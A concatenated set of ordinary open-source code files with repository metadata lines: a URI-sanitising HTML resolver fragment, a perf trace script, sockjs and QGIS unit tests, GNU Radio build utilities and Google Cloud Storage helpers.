if not scheme or scheme in ACCEPTABLE_URI_SCHEMES:
return base
return ''
uri = _urljoin(base, rel)
if uri.strip().split(':', 1)[0] not in ACCEPTABLE_URI_SCHEMES:
return ''
return uri
class _RelativeURIResolver(_BaseHTMLProcessor):
relative_uris = set([('a', 'href'),
('applet', 'codebase'),
('area', 'href'),
('audio', 'src'),
('blockquote', 'cite'),
('body', 'background'),
('del', 'cite'),
('form', 'action'),
('frame', 'longdesc'),
('frame', 'src'),
('iframe', 'longdesc'),
('iframe', 'src'),
('head', 'profile'),
('img', 'longdesc'),
('img', 'src'),
('img', 'usemap'),
('input', 'src'),
('input', 'usemap'),
('ins', 'cite'),
('link', 'href'),
('object', 'classid'),
('object', 'codebase'),
('object', 'data'),
('object', 'usemap'),
('q', 'cite'),
('script', 'src'),
('source', 'src'),
('video', 'poster'),
('video', 'src')])
def __init__(self, baseuri, encoding, _type):
_BaseHTMLProcessor.__init__(self, encoding, _type)
self.baseuri = baseuri
def resolveURI(self, uri):
return _makeSafeAbsoluteURI(self.baseuri, uri.strip())
def unknown_starttag(self, tag, attrs):
attrs = self.normalize_attrs(attrs)
attrs = [(key, ((tag, key) in self.relative_uris) and self.resolveURI(value) or value) for key, value in attrs]
_BaseHTMLProcessor.unknown_starttag(self, tag, attrs)
def _resolveRelativeURIs(htmlSource, baseURI, encoding, _type):
# if not _SGML_AVAILABLE:
# return htmlSource
p = _RelativeURIResolver(baseURI, encoding, _type)
p.feed(htmlSource)
return p.output()
| gpl-3.0 |
draekko/android_kernel_samsung_kylessopen | tools/perf/scripts/python/check-perf-trace.py | 11214 | 2503 | # perf script event handlers, generated by perf script -g python
# (c) 2010, Tom Zanussi <tzanussi@gmail.com>
# Licensed under the terms of the GNU GPL License version 2
#
# This script tests basic functionality such as flag and symbol
# strings, common_xxx() calls back into perf, begin, end, unhandled
# events, etc. Basically, if this script runs successfully and
# displays expected results, Python scripting support should be ok.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from Core import *
from perf_trace_context import *
unhandled = autodict()
def trace_begin():
print "trace_begin"
pass
def trace_end():
print_unhandled()
def irq__softirq_entry(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
vec):
print_header(event_name, common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
print_uncommon(context)
print "vec=%s\n" % \
(symbol_str("irq__softirq_entry", "vec", vec)),
def kmem__kmalloc(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
call_site, ptr, bytes_req, bytes_alloc,
gfp_flags):
print_header(event_name, common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
print_uncommon(context)
print "call_site=%u, ptr=%u, bytes_req=%u, " \
"bytes_alloc=%u, gfp_flags=%s\n" % \
(call_site, ptr, bytes_req, bytes_alloc,
flag_str("kmem__kmalloc", "gfp_flags", gfp_flags)),
def trace_unhandled(event_name, context, event_fields_dict):
try:
unhandled[event_name] += 1
except TypeError:
unhandled[event_name] = 1
def print_header(event_name, cpu, secs, nsecs, pid, comm):
print "%-20s %5u %05u.%09u %8u %-20s " % \
(event_name, cpu, secs, nsecs, pid, comm),
# print trace fields not included in handler args
def print_uncommon(context):
print "common_preempt_count=%d, common_flags=%s, common_lock_depth=%d, " \
% (common_pc(context), trace_flag_str(common_flags(context)), \
common_lock_depth(context))
def print_unhandled():
keys = unhandled.keys()
if not keys:
return
print "\nunhandled events:\n\n",
print "%-40s %10s\n" % ("event", "count"),
print "%-40s %10s\n" % ("----------------------------------------", \
"-----------"),
for event_name in keys:
print "%-40s %10d\n" % (event_name, unhandled[event_name])
| gpl-2.0 |
sprymix/sockjs | tests/test_transport.py | 2 | 2362 | from unittest import mock
from aiohttp import web
from test_base import TestCase
from sockjs import protocol
from sockjs.transports import base
class TransportTestCase(TestCase):
TRANSPORT_CLASS = base.StreamingTransport
def test_transport_ctor(self):
manager = object()
session = object()
request = self.make_request('GET', '/')
transport = base.Transport(manager, session, request)
self.assertIs(transport.manager, manager)
self.assertIs(transport.session, session)
self.assertIs(transport.request, request)
self.assertIs(transport.loop, self.loop)
def test_streaming_send(self):
trans = self.make_transport()
resp = trans.response = mock.Mock()
stop = trans.send('text data')
self.assertFalse(stop)
self.assertEqual(trans.size, len(b'text data\n'))
resp.write.assert_called_with(b'text data\n')
trans.maxsize = 1
stop = trans.send('text data')
self.assertTrue(stop)
def test_handle_session_interrupted(self):
trans = self.make_transport()
trans.session.interrupted = True
trans.send = self.make_fut(1)
trans.response = web.StreamResponse()
self.loop.run_until_complete(trans.handle_session())
trans.send.assert_called_with('c[1002,"Connection interrupted"]')
def test_handle_session_closing(self):
trans = self.make_transport()
trans.send = self.make_fut(1)
trans.session.interrupted = False
trans.session.state = protocol.STATE_CLOSING
trans.session._remote_closed = self.make_fut(1)
trans.response = web.StreamResponse()
self.loop.run_until_complete(trans.handle_session())
trans.session._remote_closed.assert_called_with()
trans.send.assert_called_with('c[3000,"Go away!"]')
def test_handle_session_closed(self):
trans = self.make_transport()
trans.send = self.make_fut(1)
trans.session.interrupted = False
trans.session.state = protocol.STATE_CLOSED
trans.session._remote_closed = self.make_fut(1)
trans.response = web.StreamResponse()
self.loop.run_until_complete(trans.handle_session())
trans.session._remote_closed.assert_called_with()
trans.send.assert_called_with('c[3000,"Go away!"]')
| apache-2.0 |
tta/gnuradio-tta | gnuradio-core/src/python/build_utils.py | 11 | 5901 | #
# Copyright 2004,2009 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
"""Misc utilities used at build time
"""
import re, os, os.path
from build_utils_codes import *
# set srcdir to the directory that contains Makefile.am
try:
srcdir = os.environ['srcdir']
except KeyError, e:
srcdir = "."
srcdir = srcdir + '/'
# set do_makefile to either true or false dependeing on the environment
try:
if os.environ['do_makefile'] == '0':
do_makefile = False
else:
do_makefile = True
except KeyError, e:
do_makefile = False
# set do_sources to either true or false dependeing on the environment
try:
if os.environ['do_sources'] == '0':
do_sources = False
else:
do_sources = True
except KeyError, e:
do_sources = True
name_dict = {}
def log_output_name (name):
(base, ext) = os.path.splitext (name)
ext = ext[1:] # drop the leading '.'
entry = name_dict.setdefault (ext, [])
entry.append (name)
def open_and_log_name (name, dir):
global do_sources
if do_sources:
f = open (name, dir)
else:
f = None
log_output_name (name)
return f
def expand_template (d, template_filename, extra = ""):
'''Given a dictionary D and a TEMPLATE_FILENAME, expand template into output file
'''
global do_sources
output_extension = extract_extension (template_filename)
template = open_src (template_filename, 'r')
output_name = d['NAME'] + extra + '.' + output_extension
log_output_name (output_name)
if do_sources:
output = open (output_name, 'w')
do_substitution (d, template, output)
output.close ()
template.close ()
def output_glue (dirname):
output_makefile_fragment ()
output_ifile_include (dirname)
def output_makefile_fragment ():
global do_makefile
if not do_makefile:
return
# overwrite the source, which must be writable; this should have been
# checked for beforehand in the top-level Makefile.gen.gen .
f = open_src ('Makefile.gen', 'w')
f.write ('#\n# This file is machine generated. All edits will be overwritten\n#\n')
output_subfrag (f, 'h')
output_subfrag (f, 'i')
output_subfrag (f, 'cc')
f.close ()
def output_ifile_include (dirname):
global do_sources
if do_sources:
f = open ('%s_generated.i' % (dirname,), 'w')
f.write ('//\n// This file is machine generated. All edits will be overwritten\n//\n')
files = name_dict.setdefault ('i', [])
files.sort ()
f.write ('%{\n')
for file in files:
f.write ('#include <%s>\n' % (file[0:-1] + 'h',))
f.write ('%}\n\n')
for file in files:
f.write ('%%include <%s>\n' % (file,))
def output_subfrag (f, ext):
files = name_dict.setdefault (ext, [])
files.sort ()
f.write ("GENERATED_%s =" % (ext.upper ()))
for file in files:
f.write (" \\\n\t%s" % (file,))
f.write ("\n\n")
def extract_extension (template_name):
# template name is something like: GrFIRfilterXXX.h.t
# we return everything between the penultimate . and .t
mo = re.search (r'\.([a-z]+)\.t$', template_name)
if not mo:
raise ValueError, "Incorrectly formed template_name '%s'" % (template_name,)
return mo.group (1)
def open_src (name, mode):
global srcdir
return open (os.path.join (srcdir, name), mode)
def do_substitution (d, in_file, out_file):
def repl (match_obj):
key = match_obj.group (1)
# print key
return d[key]
inp = in_file.read ()
out = re.sub (r"@([a-zA-Z0-9_]+)@", repl, inp)
out_file.write (out)
copyright = '''/* -*- c++ -*- */
/*
* Copyright 2003,2004 Free Software Foundation, Inc.
*
* This file is part of GNU Radio
*
* GNU Radio is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 3, or (at your option)
* any later version.
*
* GNU Radio is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with GNU Radio; see the file COPYING. If not, write to
* the Free Software Foundation, Inc., 51 Franklin Street,
* Boston, MA 02110-1301, USA.
*/
'''
def is_complex (code3):
if i_code (code3) == 'c' or o_code (code3) == 'c':
return '1'
else:
return '0'
def standard_dict (name, code3):
d = {}
d['NAME'] = name
d['GUARD_NAME'] = 'INCLUDED_%s_H' % name.upper ()
d['BASE_NAME'] = re.sub ('^gr_', '', name)
d['SPTR_NAME'] = '%s_sptr' % name
d['WARNING'] = 'WARNING: this file is machine generated. Edits will be over written'
d['COPYRIGHT'] = copyright
d['TYPE'] = i_type (code3)
d['I_TYPE'] = i_type (code3)
d['O_TYPE'] = o_type (code3)
d['TAP_TYPE'] = tap_type (code3)
d['IS_COMPLEX'] = is_complex (code3)
return d
| gpl-3.0 |
soundofjw/appengine-mapreduce | python/test/mapreduce gcs/cloudstorage/common.py | 129 | 12326 | # Copyright 2012 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
"""Helpers shared by cloudstorage_stub and cloudstorage_api."""
__all__ = ['CS_XML_NS',
'CSFileStat',
'dt_str_to_posix',
'local_api_url',
'LOCAL_GCS_ENDPOINT',
'local_run',
'get_access_token',
'get_stored_content_length',
'get_metadata',
'GCSFileStat',
'http_time_to_posix',
'memory_usage',
'posix_time_to_http',
'posix_to_dt_str',
'set_access_token',
'validate_options',
'validate_bucket_name',
'validate_bucket_path',
'validate_file_path',
]
import calendar
import datetime
from email import utils as email_utils
import logging
import os
import re
try:
from google.appengine.api import runtime
except ImportError:
from google.appengine.api import runtime
_GCS_BUCKET_REGEX_BASE = r'[a-z0-9\.\-_]{3,63}'
_GCS_BUCKET_REGEX = re.compile(_GCS_BUCKET_REGEX_BASE + r'$')
_GCS_BUCKET_PATH_REGEX = re.compile(r'/' + _GCS_BUCKET_REGEX_BASE + r'$')
_GCS_PATH_PREFIX_REGEX = re.compile(r'/' + _GCS_BUCKET_REGEX_BASE + r'.*')
_GCS_FULLPATH_REGEX = re.compile(r'/' + _GCS_BUCKET_REGEX_BASE + r'/.*')
_GCS_METADATA = ['x-goog-meta-',
'content-disposition',
'cache-control',
'content-encoding']
_GCS_OPTIONS = _GCS_METADATA + ['x-goog-acl']
CS_XML_NS = 'http://doc.s3.amazonaws.com/2006-03-01'
LOCAL_GCS_ENDPOINT = '/_ah/gcs'
_access_token = ''
_MAX_GET_BUCKET_RESULT = 1000
def set_access_token(access_token):
"""Set the shared access token to authenticate with Google Cloud Storage.
When set, the library will always attempt to communicate with the
real Google Cloud Storage with this token even when running on dev appserver.
Note the token could expire so it's up to you to renew it.
When absent, the library will automatically request and refresh a token
on appserver, or when on dev appserver, talk to a Google Cloud Storage
stub.
Args:
access_token: you can get one by run 'gsutil -d ls' and copy the
str after 'Bearer'.
"""
global _access_token
_access_token = access_token
def get_access_token():
"""Returns the shared access token."""
return _access_token
class GCSFileStat(object):
"""Container for GCS file stat."""
def __init__(self,
filename,
st_size,
etag,
st_ctime,
content_type=None,
metadata=None,
is_dir=False):
"""Initialize.
For files, the non optional arguments are always set.
For directories, only filename and is_dir is set.
Args:
filename: a Google Cloud Storage filename of form '/bucket/filename'.
st_size: file size in bytes. long compatible.
etag: hex digest of the md5 hash of the file's content. str.
st_ctime: posix file creation time. float compatible.
content_type: content type. str.
metadata: a str->str dict of user specified options when creating
the file. Possible keys are x-goog-meta-, content-disposition,
content-encoding, and cache-control.
is_dir: True if this represents a directory. False if this is a real file.
"""
self.filename = filename
self.is_dir = is_dir
self.st_size = None
self.st_ctime = None
self.etag = None
self.content_type = content_type
self.metadata = metadata
if not is_dir:
self.st_size = long(st_size)
self.st_ctime = float(st_ctime)
if etag[0] == '"' and etag[-1] == '"':
etag = etag[1:-1]
self.etag = etag
def __repr__(self):
if self.is_dir:
return '(directory: %s)' % self.filename
return (
'(filename: %(filename)s, st_size: %(st_size)s, '
'st_ctime: %(st_ctime)s, etag: %(etag)s, '
'content_type: %(content_type)s, '
'metadata: %(metadata)s)' %
dict(filename=self.filename,
st_size=self.st_size,
st_ctime=self.st_ctime,
etag=self.etag,
content_type=self.content_type,
metadata=self.metadata))
def __cmp__(self, other):
if not isinstance(other, self.__class__):
raise ValueError('Argument to cmp must have the same type. '
'Expect %s, got %s', self.__class__.__name__,
other.__class__.__name__)
if self.filename > other.filename:
return 1
elif self.filename < other.filename:
return -1
return 0
def __hash__(self):
if self.etag:
return hash(self.etag)
return hash(self.filename)
CSFileStat = GCSFileStat
def get_stored_content_length(headers):
"""Return the content length (in bytes) of the object as stored in GCS.
x-goog-stored-content-length should always be present except when called via
the local dev_appserver. Therefore if it is not present we default to the
standard content-length header.
Args:
headers: a dict of headers from the http response.
Returns:
the stored content length.
"""
length = headers.get('x-goog-stored-content-length')
if length is None:
length = headers.get('content-length')
return length
def get_metadata(headers):
"""Get user defined options from HTTP response headers."""
return dict((k, v) for k, v in headers.iteritems()
if any(k.lower().startswith(valid) for valid in _GCS_METADATA))
def validate_bucket_name(name):
"""Validate a Google Storage bucket name.
Args:
name: a Google Storage bucket name with no prefix or suffix.
Raises:
ValueError: if name is invalid.
"""
_validate_path(name)
if not _GCS_BUCKET_REGEX.match(name):
raise ValueError('Bucket should be 3-63 characters long using only a-z,'
'0-9, underscore, dash or dot but got %s' % name)
def validate_bucket_path(path):
"""Validate a Google Cloud Storage bucket path.
Args:
path: a Google Storage bucket path. It should have form '/bucket'.
Raises:
ValueError: if path is invalid.
"""
_validate_path(path)
if not _GCS_BUCKET_PATH_REGEX.match(path):
raise ValueError('Bucket should have format /bucket '
'but got %s' % path)
def validate_file_path(path):
"""Validate a Google Cloud Storage file path.
Args:
path: a Google Storage file path. It should have form '/bucket/filename'.
Raises:
ValueError: if path is invalid.
"""
_validate_path(path)
if not _GCS_FULLPATH_REGEX.match(path):
raise ValueError('Path should have format /bucket/filename '
'but got %s' % path)
def _process_path_prefix(path_prefix):
"""Validate and process a Google Cloud Stoarge path prefix.
Args:
path_prefix: a Google Cloud Storage path prefix of format '/bucket/prefix'
or '/bucket/' or '/bucket'.
Raises:
ValueError: if path is invalid.
Returns:
a tuple of /bucket and prefix. prefix can be None.
"""
_validate_path(path_prefix)
if not _GCS_PATH_PREFIX_REGEX.match(path_prefix):
raise ValueError('Path prefix should have format /bucket, /bucket/, '
'or /bucket/prefix but got %s.' % path_prefix)
bucket_name_end = path_prefix.find('/', 1)
bucket = path_prefix
prefix = None
if bucket_name_end != -1:
bucket = path_prefix[:bucket_name_end]
prefix = path_prefix[bucket_name_end + 1:] or None
return bucket, prefix
def _validate_path(path):
"""Basic validation of Google Storage paths.
Args:
path: a Google Storage path. It should have form '/bucket/filename'
or '/bucket'.
Raises:
ValueError: if path is invalid.
TypeError: if path is not of type basestring.
"""
if not path:
raise ValueError('Path is empty')
if not isinstance(path, basestring):
raise TypeError('Path should be a string but is %s (%s).' %
(path.__class__, path))
def validate_options(options):
"""Validate Google Cloud Storage options.
Args:
options: a str->basestring dict of options to pass to Google Cloud Storage.
Raises:
ValueError: if option is not supported.
TypeError: if option is not of type str or value of an option
is not of type basestring.
"""
if not options:
return
for k, v in options.iteritems():
if not isinstance(k, str):
raise TypeError('option %r should be a str.' % k)
if not any(k.lower().startswith(valid) for valid in _GCS_OPTIONS):
raise ValueError('option %s is not supported.' % k)
if not isinstance(v, basestring):
raise TypeError('value %r for option %s should be of type basestring.' %
(v, k))
def http_time_to_posix(http_time):
"""Convert HTTP time format to posix time.
See http://www.w3.org/Protocols/rfc2616/rfc2616-sec3.html#sec3.3.1
for http time format.
Args:
http_time: time in RFC 2616 format. e.g.
"Mon, 20 Nov 1995 19:12:08 GMT".
Returns:
A float of secs from unix epoch.
"""
if http_time is not None:
return email_utils.mktime_tz(email_utils.parsedate_tz(http_time))
def posix_time_to_http(posix_time):
"""Convert posix time to HTML header time format.
Args:
posix_time: unix time.
Returns:
A datatime str in RFC 2616 format.
"""
if posix_time:
return email_utils.formatdate(posix_time, usegmt=True)
_DT_FORMAT = '%Y-%m-%dT%H:%M:%S'
def dt_str_to_posix(dt_str):
"""format str to posix.
datetime str is of format %Y-%m-%dT%H:%M:%S.%fZ,
e.g. 2013-04-12T00:22:27.978Z. According to ISO 8601, T is a separator
between date and time when they are on the same line.
Z indicates UTC (zero meridian).
A pointer: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
This is used to parse LastModified node from GCS's GET bucket XML response.
Args:
dt_str: A datetime str.
Returns:
A float of secs from unix epoch. By posix definition, epoch is midnight
1970/1/1 UTC.
"""
parsable, _ = dt_str.split('.')
dt = datetime.datetime.strptime(parsable, _DT_FORMAT)
return calendar.timegm(dt.utctimetuple())
def posix_to_dt_str(posix):
"""Reverse of str_to_datetime.
This is used by GCS stub to generate GET bucket XML response.
Args:
posix: A float of secs from unix epoch.
Returns:
A datetime str.
"""
dt = datetime.datetime.utcfromtimestamp(posix)
dt_str = dt.strftime(_DT_FORMAT)
return dt_str + '.000Z'
def local_run():
"""Whether we should hit GCS dev appserver stub."""
server_software = os.environ.get('SERVER_SOFTWARE')
if server_software is None:
return True
if 'remote_api' in server_software:
return False
if server_software.startswith(('Development', 'testutil')):
return True
return False
def local_api_url():
"""Return URL for GCS emulation on dev appserver."""
return 'http://%s%s' % (os.environ.get('HTTP_HOST'), LOCAL_GCS_ENDPOINT)
def memory_usage(method):
"""Log memory usage before and after a method."""
def wrapper(*args, **kwargs):
logging.info('Memory before method %s is %s.',
method.__name__, runtime.memory_usage().current())
result = method(*args, **kwargs)
logging.info('Memory after method %s is %s',
method.__name__, runtime.memory_usage().current())
return result
return wrapper
def _add_ns(tagname):
return '{%(ns)s}%(tag)s' % {'ns': CS_XML_NS,
'tag': tagname}
_T_CONTENTS = _add_ns('Contents')
_T_LAST_MODIFIED = _add_ns('LastModified')
_T_ETAG = _add_ns('ETag')
_T_KEY = _add_ns('Key')
_T_SIZE = _add_ns('Size')
_T_PREFIX = _add_ns('Prefix')
_T_COMMON_PREFIXES = _add_ns('CommonPrefixes')
_T_NEXT_MARKER = _add_ns('NextMarker')
_T_IS_TRUNCATED = _add_ns('IsTruncated')
| apache-2.0 |
borysiasty/QGIS | tests/src/python/test_qgslayoutpolygon.py | 26 | 12819 | # -*- coding: utf-8 -*-
"""QGIS Unit tests for QgsLayoutItemPolygon.
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = '(C) 2016 by Paul Blottiere'
__date__ = '14/03/2016'
__copyright__ = 'Copyright 2016, The QGIS Project'
import qgis # NOQA
from qgis.PyQt.QtGui import QPolygonF, QPainter, QImage
from qgis.PyQt.QtCore import QPointF, QRectF
from qgis.PyQt.QtXml import QDomDocument
from qgis.PyQt.QtTest import QSignalSpy
from qgis.core import (QgsLayoutItemPolygon,
QgsLayoutItemRegistry,
QgsLayout,
QgsFillSymbol,
QgsProject,
QgsReadWriteContext,
QgsLayoutItem,
QgsLayoutItemRenderContext,
QgsLayoutUtils)
from qgis.testing import (start_app,
unittest
)
from utilities import unitTestDataPath
from qgslayoutchecker import QgsLayoutChecker
from test_qgslayoutitem import LayoutItemTestCase
start_app()
TEST_DATA_DIR = unitTestDataPath()
class TestQgsLayoutPolygon(unittest.TestCase, LayoutItemTestCase):
@classmethod
def setUpClass(cls):
cls.item_class = QgsLayoutItemPolygon
def __init__(self, methodName):
"""Run once on class initialization."""
unittest.TestCase.__init__(self, methodName)
# create composition
self.layout = QgsLayout(QgsProject.instance())
self.layout.initializeDefaults()
# create
polygon = QPolygonF()
polygon.append(QPointF(0.0, 0.0))
polygon.append(QPointF(100.0, 0.0))
polygon.append(QPointF(200.0, 100.0))
polygon.append(QPointF(100.0, 200.0))
self.polygon = QgsLayoutItemPolygon(polygon, self.layout)
self.layout.addLayoutItem(self.polygon)
# style
props = {}
props["color"] = "green"
props["style"] = "solid"
props["style_border"] = "solid"
props["color_border"] = "black"
props["width_border"] = "10.0"
props["joinstyle"] = "miter"
style = QgsFillSymbol.createSimple(props)
self.polygon.setSymbol(style)
def testNodes(self):
polygon = QPolygonF()
polygon.append(QPointF(0.0, 0.0))
polygon.append(QPointF(100.0, 0.0))
polygon.append(QPointF(200.0, 100.0))
polygon.append(QPointF(100.0, 200.0))
p = QgsLayoutItemPolygon(polygon, self.layout)
self.assertEqual(p.nodes(), polygon)
polygon = QPolygonF()
polygon.append(QPointF(0.0, 0.0))
polygon.append(QPointF(1000.0, 0.0))
polygon.append(QPointF(2000.0, 100.0))
polygon.append(QPointF(1000.0, 200.0))
p.setNodes(polygon)
self.assertEqual(p.nodes(), polygon)
def testDisplayName(self):
"""Test if displayName is valid"""
self.assertEqual(self.polygon.displayName(), "<Polygon>")
def testType(self):
"""Test if type is valid"""
self.assertEqual(
self.polygon.type(), QgsLayoutItemRegistry.LayoutPolygon)
def testDefaultStyle(self):
"""Test polygon rendering with default style."""
self.polygon.setDisplayNodes(False)
checker = QgsLayoutChecker(
'composerpolygon_defaultstyle', self.layout)
checker.setControlPathPrefix("composer_polygon")
myTestResult, myMessage = checker.testLayout()
assert myTestResult, myMessage
def testDisplayNodes(self):
"""Test displayNodes method"""
self.polygon.setDisplayNodes(True)
checker = QgsLayoutChecker(
'composerpolygon_displaynodes', self.layout)
checker.setControlPathPrefix("composer_polygon")
myTestResult, myMessage = checker.testLayout()
assert myTestResult, myMessage
self.polygon.setDisplayNodes(False)
checker = QgsLayoutChecker(
'composerpolygon_defaultstyle', self.layout)
checker.setControlPathPrefix("composer_polygon")
myTestResult, myMessage = checker.testLayout()
assert myTestResult, myMessage
def testSelectedNode(self):
"""Test selectedNode and deselectNode methods"""
self.polygon.setDisplayNodes(True)
self.polygon.setSelectedNode(3)
checker = QgsLayoutChecker(
'composerpolygon_selectednode', self.layout)
checker.setControlPathPrefix("composer_polygon")
myTestResult, myMessage = checker.testLayout()
assert myTestResult, myMessage
self.polygon.deselectNode()
self.polygon.setDisplayNodes(False)
checker = QgsLayoutChecker(
'composerpolygon_defaultstyle', self.layout)
checker.setControlPathPrefix("composer_polygon")
myTestResult, myMessage = checker.testLayout()
assert myTestResult, myMessage
def testRemoveNode(self):
"""Test removeNode method"""
rc = self.polygon.removeNode(100)
self.assertEqual(rc, False)
checker = QgsLayoutChecker(
'composerpolygon_defaultstyle', self.layout)
checker.setControlPathPrefix("composer_polygon")
myTestResult, myMessage = checker.testLayout()
assert myTestResult, myMessage
self.assertEqual(self.polygon.nodesSize(), 4)
def testAddNode(self):
"""Test addNode method"""
# default searching radius is 10
self.assertEqual(self.polygon.nodesSize(), 4)
rc = self.polygon.addNode(QPointF(50.0, 10.0))
self.assertEqual(rc, False)
# default searching radius is 10
self.assertEqual(self.polygon.nodesSize(), 4)
rc = self.polygon.addNode(QPointF(50.0, 9.99))
self.assertEqual(rc, True)
self.assertEqual(self.polygon.nodesSize(), 5)
def testAddNodeCustomRadius(self):
"""Test addNode with custom radius"""
# default searching radius is 10
self.assertEqual(self.polygon.nodesSize(), 4)
rc = self.polygon.addNode(QPointF(50.0, 8.1), True, 8.0)
self.assertEqual(rc, False)
self.assertEqual(self.polygon.nodesSize(), 4)
# default searching radius is 10
rc = self.polygon.addNode(QPointF(50.0, 7.9), True, 8.0)
self.assertEqual(rc, True)
self.assertEqual(self.polygon.nodesSize(), 5)
def testAddNodeWithoutCheckingArea(self):
"""Test addNode without checking the maximum distance allowed"""
# default searching radius is 10
self.assertEqual(self.polygon.nodesSize(), 4)
rc = self.polygon.addNode(QPointF(50.0, 20.0))
self.assertEqual(rc, False)
self.assertEqual(self.polygon.nodesSize(), 4)
# default searching radius is 10
self.assertEqual(self.polygon.nodesSize(), 4)
rc = self.polygon.addNode(QPointF(50.0, 20.0), False)
self.assertEqual(rc, True)
self.assertEqual(self.polygon.nodesSize(), 5)
checker = QgsLayoutChecker(
'composerpolygon_addnode', self.layout)
checker.setControlPathPrefix("composer_polygon")
myTestResult, myMessage = checker.testLayout()
assert myTestResult, myMessage
def testMoveNode(self):
"""Test moveNode method"""
rc = self.polygon.moveNode(30, QPointF(100.0, 300.0))
self.assertEqual(rc, False)
rc = self.polygon.moveNode(3, QPointF(100.0, 150.0))
self.assertEqual(rc, True)
checker = QgsLayoutChecker(
'composerpolygon_movenode', self.layout)
checker.setControlPathPrefix("composer_polygon")
myTestResult, myMessage = checker.testLayout()
assert myTestResult, myMessage
def testNodeAtPosition(self):
"""Test nodeAtPosition method"""
p = QPolygonF()
p.append(QPointF(0.0, 0.0))
p.append(QPointF(100.0, 0.0))
p.append(QPointF(200.0, 100.0))
p.append(QPointF(100.0, 200.0))
polygon = QgsLayoutItemPolygon(p, self.layout)
# default searching radius is 10
rc = polygon.nodeAtPosition(QPointF(100.0, 210.0))
self.assertEqual(rc, -1)
# default searching radius is 10
rc = polygon.nodeAtPosition(
QPointF(100.0, 210.0), False)
self.assertEqual(rc, 3)
# default searching radius is 10
rc = polygon.nodeAtPosition(
QPointF(100.0, 210.0), True, 10.1)
self.assertEqual(rc, 3)
def testReadWriteXml(self):
pr = QgsProject()
l = QgsLayout(pr)
p = QPolygonF()
p.append(QPointF(0.0, 0.0))
p.append(QPointF(100.0, 0.0))
p.append(QPointF(200.0, 100.0))
shape = QgsLayoutItemPolygon(p, l)
props = {}
props["color"] = "green"
props["style"] = "solid"
props["style_border"] = "solid"
props["color_border"] = "red"
props["width_border"] = "10.0"
props["joinstyle"] = "miter"
style = QgsFillSymbol.createSimple(props)
shape.setSymbol(style)
# save original item to xml
doc = QDomDocument("testdoc")
elem = doc.createElement("test")
self.assertTrue(shape.writeXml(elem, doc, QgsReadWriteContext()))
shape2 = QgsLayoutItemPolygon(l)
self.assertTrue(shape2.readXml(elem.firstChildElement(), doc, QgsReadWriteContext()))
self.assertEqual(shape2.nodes(), shape.nodes())
self.assertEqual(shape2.symbol().symbolLayer(0).color().name(), '#008000')
self.assertEqual(shape2.symbol().symbolLayer(0).strokeColor().name(), '#ff0000')
def testBounds(self):
pr = QgsProject()
l = QgsLayout(pr)
p = QPolygonF()
p.append(QPointF(50.0, 30.0))
p.append(QPointF(100.0, 10.0))
p.append(QPointF(200.0, 100.0))
shape = QgsLayoutItemPolygon(p, l)
props = {}
props["color"] = "green"
props["style"] = "solid"
props["style_border"] = "solid"
props["color_border"] = "red"
props["width_border"] = "6.0"
props["joinstyle"] = "miter"
style = QgsFillSymbol.createSimple(props)
shape.setSymbol(style)
# scene bounding rect should include symbol outline
bounds = shape.sceneBoundingRect()
self.assertEqual(bounds.left(), 47.0)
self.assertEqual(bounds.right(), 203.0)
self.assertEqual(bounds.top(), 7.0)
self.assertEqual(bounds.bottom(), 103.0)
# rectWithFrame should include symbol outline too
bounds = shape.rectWithFrame()
self.assertEqual(bounds.left(), -3.0)
self.assertEqual(bounds.right(), 153.0)
self.assertEqual(bounds.top(), -3.0)
self.assertEqual(bounds.bottom(), 93.0)
def testClipPath(self):
pr = QgsProject()
l = QgsLayout(pr)
p = QPolygonF()
p.append(QPointF(50.0, 30.0))
p.append(QPointF(100.0, 10.0))
p.append(QPointF(200.0, 100.0))
shape = QgsLayoutItemPolygon(p, l)
# must be a closed polygon, in scene coordinates!
self.assertEqual(shape.clipPath().asWkt(), 'Polygon ((50 30, 100 10, 200 100, 50 30))')
self.assertTrue(int(shape.itemFlags() & QgsLayoutItem.FlagProvidesClipPath))
spy = QSignalSpy(shape.clipPathChanged)
self.assertTrue(shape.addNode(QPointF(150, 110), False))
self.assertEqual(shape.clipPath().asWkt(), 'Polygon ((50 30, 100 10, 200 100, 150 110, 50 30))')
self.assertEqual(len(spy), 1)
shape.removeNode(3)
self.assertEqual(len(spy), 2)
self.assertEqual(shape.clipPath().asWkt(), 'Polygon ((50 30, 100 10, 200 100, 50 30))')
shape.moveNode(2, QPointF(180, 100))
self.assertEqual(len(spy), 3)
self.assertEqual(shape.clipPath().asWkt(), 'Polygon ((50 30, 100 10, 180 100, 50 30))')
shape.setNodes(p)
self.assertEqual(len(spy), 4)
